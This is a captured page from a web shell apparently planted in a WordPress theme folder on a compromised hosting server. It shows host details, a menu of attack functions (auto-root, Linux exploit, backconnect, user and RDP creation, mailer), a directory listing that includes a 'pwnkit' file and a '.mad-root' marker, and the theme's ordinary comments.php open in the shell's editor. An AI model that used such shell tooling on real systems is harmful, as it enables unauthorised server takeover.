Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
themes /
agama /
[ HOME SHELL ]
Name
Size
Permission
Action
assets
[ DIR ]
drwxr-xr-x
framework
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
templates
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
README.txt
23.33
KB
-rw-r--r--
author.php
4.52
KB
-rw-r--r--
bbpress.php
886
B
-rw-r--r--
category.php
1.25
KB
-rw-r--r--
comments.php
2.22
KB
-rw-r--r--
editor-style-rtl.css
382
B
-rw-r--r--
editor-style.css
5.35
KB
-rw-r--r--
footer.php
953
B
-rw-r--r--
functions.php
1.54
KB
-rw-r--r--
header.php
1.85
KB
-rw-r--r--
image.php
6.37
KB
-rw-r--r--
index.php
967
B
-rw-r--r--
license.txt
17.69
KB
-rw-r--r--
page.php
708
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
rtl.css
5.51
KB
-rw-r--r--
screenshot.png
289.73
KB
-rw-r--r--
searchform.php
666
B
-rw-r--r--
sidebar.php
814
B
-rw-r--r--
style.css
90.01
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comments.php
<?php /** * The template for displaying Comments * * The area of the page that contains both current comments * and the comment form. The actual display of comments is * handled by a callback to agama_comment() which is * located in the agama-functions.php file. * * @package Theme-Vision * @subpackage Agama * @since Agama 1.0 */ // Do not allow direct access to the file. if( ! defined( 'ABSPATH' ) ) { exit; } /* * If comments are disabled do not output anything. */ if( ! get_theme_mod( 'agama_blog_post_comments', true ) ) return; /* * If the current post is protected by a password and * the visitor has not yet entered the password we will * return early without loading the comments. */ if ( post_password_required() ) return; ?> <div id="comments" class="comments-area"> <?php // You can start editing here -- including this comment! ?> <?php if ( have_comments() ) { ?> <h2 class="comments-title"> <?php printf( _n( '<span>%1$s</span> Comment', '<span>%1$s</span> Comments', get_comments_number(), 'agama' ), number_format_i18n( get_comments_number() ), '<span>' . get_the_title() . '</span>' ); ?> </h2> <ol class="commentlist"> <?php wp_list_comments( array( 'callback' => 'agama_comment', 'style' => 'ol' ) ); ?> </ol> <?php if ( get_comment_pages_count() > 1 && get_option( 'page_comments' ) ) : // are there comments to navigate through ?> <nav id="comment-nav-below" class="navigation" role="navigation"> <h1 class="screen-reader-text section-heading"><?php esc_html_e( 'Comment navigation', 'agama' ); ?></h1> <div class="nav-previous"><?php previous_comments_link( __( '← Older Comments', 'agama' ) ); ?></div> <div class="nav-next"><?php next_comments_link( __( 'Newer Comments →', 'agama' ) ); ?></div> </nav> <?php endif; // check for comment navigation ?> <?php /* If there are no comments and comments are closed, let's leave a note. * But we only want the note on posts and pages that had comments in the first place. */ if ( ! comments_open() && get_comments_number() ) : ?> <p class="nocomments"><?php _e( 'Comments are closed.' , 'agama' ); ?></p> <?php endif; ?> <?php } ?> <?php comment_form(); ?> </div><!-- #comments .comments-area -->
Close